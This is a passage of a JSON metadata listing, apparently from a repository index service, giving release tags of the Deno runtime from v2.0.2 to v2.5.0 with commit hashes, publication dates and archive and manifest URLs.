5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_i